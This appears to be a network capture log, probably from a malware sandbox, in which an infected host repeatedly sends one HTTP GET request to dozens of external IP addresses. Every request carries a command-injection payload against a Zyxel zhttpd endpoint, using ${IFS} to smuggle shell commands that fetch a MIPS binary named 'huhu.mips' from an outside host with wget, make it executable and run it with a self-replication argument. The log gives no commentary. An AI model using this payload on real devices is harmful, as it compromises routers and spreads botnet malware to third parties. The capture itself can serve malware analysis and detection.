                                                  Jan 19, 2024 18:24:05.243819952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6764192.168.2.1350506192.174.123.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243844032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6765192.168.2.1358206145.254.213.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243899107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6766192.168.2.1359966177.133.6.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243931055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6767192.168.2.1343444161.87.163.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243968964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6768192.168.2.13349045.31.202.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.243999004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6769192.168.2.135337061.15.198.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244031906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6770192.168.2.1336616210.134.244.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244059086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6771192.168.2.1349164147.240.126.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244105101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6772192.168.2.1340082106.60.106.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244143963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6773192.168.2.1343686125.204.201.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244168043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6774192.168.2.133355890.56.10.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244218111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6775192.168.2.134947435.216.241.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244254112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6776192.168.2.133488061.55.97.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244287014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6777192.168.2.135083873.60.68.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244334936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6778192.168.2.13413645.99.189.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244376898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6779192.168.2.135006866.206.37.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244393110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6780192.168.2.1338132172.128.57.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244463921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6781192.168.2.1343384118.157.15.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244502068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6782192.168.2.135846892.220.231.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244541883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6783192.168.2.134069251.189.161.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244586945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6784192.168.2.1340282146.88.218.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244631052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6785192.168.2.1339008202.203.239.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244673014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6786192.168.2.133907484.194.117.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244713068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6787192.168.2.1346876149.108.61.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244746923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6788192.168.2.135325491.47.133.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244786978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6789192.168.2.1333134112.34.80.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244823933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6790192.168.2.134474850.137.225.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244875908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6791192.168.2.1340030156.139.74.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244890928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6792192.168.2.1352462157.107.97.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244937897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6793192.168.2.133906067.144.216.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.244976997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6794192.168.2.1348508208.2.199.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245022058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6795192.168.2.133663879.104.127.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245070934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6796192.168.2.1358818202.136.92.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245093107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6797192.168.2.1354620136.67.111.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245124102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6798192.168.2.134841063.146.248.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245157003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6799192.168.2.135541653.80.20.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245196104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6800192.168.2.133381235.79.33.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245250940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6801192.168.2.1360214213.180.134.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245295048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6802192.168.2.135402697.135.55.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245327950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6803192.168.2.1345962132.151.221.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245369911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6804192.168.2.135083660.8.115.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245383024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6805192.168.2.1356464189.28.144.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245441914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6806192.168.2.1358736196.146.86.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245472908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6807192.168.2.1334452180.193.195.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245532036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6808192.168.2.1353186119.244.29.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245568991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6809192.168.2.134752413.124.84.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245606899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6810192.168.2.1351044201.11.206.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245630980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6811192.168.2.1337160150.13.89.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245670080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6812192.168.2.13495024.91.88.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245709896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6813192.168.2.1333990192.125.70.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245762110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6814192.168.2.133694620.10.115.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245801926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6815192.168.2.1337026149.159.10.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245836973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6816192.168.2.1353526128.196.194.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245860100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6817192.168.2.133430250.191.154.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245897055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6818192.168.2.1342612119.219.136.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.245964050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6819192.168.2.1337526113.5.25.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246006012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6820192.168.2.135540884.235.59.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246049881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6821192.168.2.1351912213.46.147.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246068001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6822192.168.2.1340384168.173.118.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246114016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6823192.168.2.1334242178.181.253.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246155977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6824192.168.2.1344490164.98.31.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246187925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6825192.168.2.134444267.40.233.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:05.246225119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6826192.168.2.1359372184.4.235.248443
                                                  TimestampBytes transferredDirectionData
